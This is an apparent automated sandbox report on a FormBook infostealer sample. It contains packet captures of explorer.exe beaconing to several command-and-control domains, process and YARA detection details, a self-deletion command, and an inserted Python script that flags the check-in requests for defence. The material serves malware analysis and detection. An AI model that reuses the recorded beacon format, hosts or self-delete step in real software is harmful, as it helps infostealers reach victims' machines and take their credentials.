2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 
63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49169 | 162.0.232.162 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:24.141268015 CEST | 6 | OUT | GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1
                                                                  Host: www.theseattlenotary.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
Sep 27, 2021 17:32:24.307697058 CEST | 8 | IN | HTTP/1.1 301 Moved Permanently
                                                                  keep-alive: timeout=5, max=100
                                                                  content-type: text/html
                                                                  content-length: 707
                                                                  date: Mon, 27 Sep 2021 15:32:24 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz
                                                                  x-turbo-charged-by: LiteSpeed
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 
63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
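
The script below is an added example, not part of the Joe Sandbox report. It takes the six check-in requests explorer.exe issued in sessions 0 to 5 of this section (request line, Host and Connection headers reproduced from the capture; the seven 0x00 bytes the report records after each request are not modelled) plus one constructed browser request as a control, and scores each on the traits the report's signatures point at: a GET with no User-Agent, "Connection: close", a short alphanumeric directory, exactly two query parameters, a value that is identical across otherwise unrelated hosts (a8a=O6e4vnipWHrd6Lz appears on every one of the six), and origin in the injected explorer.exe. The scoring thresholds, function names and the firefox.exe control path are our assumptions. Note that the two parameters swap order between requests (sessions 1 and 4 lead with 1bxhyLu), so the check matches on the parameter set rather than on the raw query string, and it deliberately does not URL-decode the values because "+" and "/" are part of the encoded blob.

```python
"""Added example: score the check-in requests recorded in the HTTP Packets section."""
import re
from collections import defaultdict

EXPLORER = "C:\\Windows\\explorer.exe"
REQUESTS = [  # (originating process, raw request head as captured)
    (EXPLORER, "GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1\r\n"
               "Host: www.wwiilive.com\r\nConnection: close\r\n\r\n"),
    (EXPLORER, "GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1\r\n"
               "Host: www.dunedinhyperlocal.com\r\nConnection: close\r\n\r\n"),
    (EXPLORER, "GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1\r\n"
               "Host: www.oinfoproduto.com\r\nConnection: close\r\n\r\n"),
    (EXPLORER, "GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1\r\n"
               "Host: www.multicoininvestment.com\r\nConnection: close\r\n\r\n"),
    (EXPLORER, "GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1\r\n"
               "Host: www.theseattlenotary.com\r\nConnection: close\r\n\r\n"),
    (EXPLORER, "GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1\r\n"
               "Host: www.petersonmovingco.com\r\nConnection: close\r\n\r\n"),
    # Constructed control (hypothetical browser path): an ordinary fetch that must not be flagged.
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n"
     "Connection: keep-alive\r\n\r\n"),
]

# The capture uses a four-character directory (/u4an/); match any short alphanumeric one.
SHORT_DIR = re.compile(r"^/[a-z0-9]{2,8}/$")


def parse_request(raw):
    """Split a raw request head into method, path, ordered query pairs and lower-cased headers."""
    lines = raw.partition("\r\n\r\n")[0].split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # partition("=")[::2] keeps (name, value) split at the first '='; no URL-decoding on purpose.
    params = [tuple(pair.partition("=")[::2]) for pair in query.split("&")] if query else []
    return {"method": method, "path": path, "params": params, "headers": headers}


def shared_values(parsed, min_hosts=3):
    """Query pairs that recur with the same value on several distinct hosts: a fixed bot or campaign id."""
    hosts = defaultdict(set)
    for req in parsed:
        for pair in req["params"]:
            hosts[pair].add(req["headers"].get("host", ""))
    return {pair: sorted(h) for pair, h in hosts.items() if len(h) >= min_hosts}


def reasons_for(req, shared):
    """Traits of one request that match the check-in pattern."""
    hdr, out = req["headers"], []
    if "user-agent" not in hdr:
        out.append("no User-Agent")
    if hdr.get("connection", "").lower() == "close":
        out.append("Connection: close")
    if SHORT_DIR.match(req["path"]):
        out.append("short directory path")
    if req["method"] == "GET" and len(req["params"]) == 2:
        out.append("GET with exactly two query parameters")
    if any(pair in shared for pair in req["params"]):
        out.append("parameter value shared with other hosts")
    if req["process"].lower().endswith("\\explorer.exe"):
        out.append("sent by explorer.exe")
    return out


def triage(requests, threshold=4):
    """Return [(host, reasons)] for every request that shows at least `threshold` traits."""
    parsed = [dict(parse_request(raw), process=proc) for proc, raw in requests]
    shared = shared_values(parsed)
    hits = []
    for req in parsed:
        reasons = reasons_for(req, shared)
        if len(reasons) >= threshold:
            hits.append((req["headers"].get("host", ""), reasons))
    return hits


if __name__ == "__main__":
    for host, reasons in triage(REQUESTS):
        print(f"{host}: {', '.join(reasons)}")
    print("shared:", shared_values([parse_request(raw) for _, raw in REQUESTS]))
```

All six capture hosts come back with all six traits and the control with none. The cross-host check is the one worth keeping in a real detection: a single request with no User-Agent is common enough to be noise, but the same opaque parameter value sent by one process to several unrelated domains within a minute is not.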


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49170 | 216.239.32.21 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:32:29.450268984 CEST | 8 | OUT | GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1
                                                                  Host: www.petersonmovingco.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Sep 27, 2021 17:32:29.531821966 CEST
                                                                  kBytes transferred:10
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 200 OK
                                                                  Content-Type: text/html; charset=utf-8
                                                                  x-ua-compatible: IE=edge
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Mon, 27 Sep 2021 15:32:29 GMT
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Cross-Origin-Opener-Policy: unsafe-none
                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Q2VDqHH8JEhHLrd9BvMcDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Server: ESF
                                                                  X-XSS-Protection: 0
                                                                  X-Content-Type-Options: nosniff
                                                                  Set-Cookie: NID=511=Wbsymr0SWWRHD-rgYevkhlyxEht6VWs54689I0H8buzMRXggbGvzdbaW38cH3R9CI0-WqXrcOYZhJqr4bhoRK_izgLLSbsYN41B7yTQNTDIkOaKP9zhPiH4b7pQo9_Dxe6RieNOgYlXHOAGFDnfGUZNbKpODKC8TiUvlRaTWHjc; expires=Tue, 29-Mar-2022 15:32:29 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Accept-Ranges: none
                                                                  Vary: Accept-Encoding
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/LocalBusiness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="Q2VDqHH8JEhHLrd9BvMcDw">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.goog


                                                                  Session ID:6
                                                                  Source IP:192.168.2.22
                                                                  Source Port:49171
                                                                  Destination IP:162.251.85.174
                                                                  Destination Port:80
                                                                  Process:C:\Windows\explorer.exe
                                                                  Timestamp:Sep 27, 2021 17:32:39.962572098 CEST
                                                                  kBytes transferred:52
                                                                  Direction:OUT
                                                                  Data:GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1
                                                                  Host: www.quinnwebster.top
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Sep 27, 2021 17:32:40.120680094 CEST
                                                                  kBytes transferred:53
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 404 Not Found
                                                                  Date: Mon, 27 Sep 2021 15:32:40 GMT
                                                                  Server: nginx/1.19.5
                                                                  Content-Type: text/html
                                                                  Content-Length: 583
                                                                  Last-Modified: Sat, 24 Jul 2021 10:05:02 GMT
                                                                  Accept-Ranges: bytes
                                                                  Vary: Accept-Encoding
                                                                  Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  System Behavior

                                                                  General

                                                                  Start time:17:31:14
                                                                  Start date:27/09/2021
                                                                  Path:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\ejecutable1.exe'
                                                                  Imagebase:0xf50000
                                                                  File size:840192 bytes
                                                                  MD5 hash:FF2724DDF0EF0525E9E419DB5199E96F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:31:18
                                                                  Start date:27/09/2021
                                                                  Path:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Imagebase:0xf50000
                                                                  File size:840192 bytes
                                                                  MD5 hash:FF2724DDF0EF0525E9E419DB5199E96F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:31:19
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0xffa10000
                                                                  File size:3229696 bytes
                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  General

                                                                  Start time:17:31:32
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                  Imagebase:0xbe0000
                                                                  File size:983040 bytes
                                                                  MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:17:31:36
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\ejecutable1.exe'
                                                                  Imagebase:0x4a890000
                                                                  File size:302592 bytes
                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis
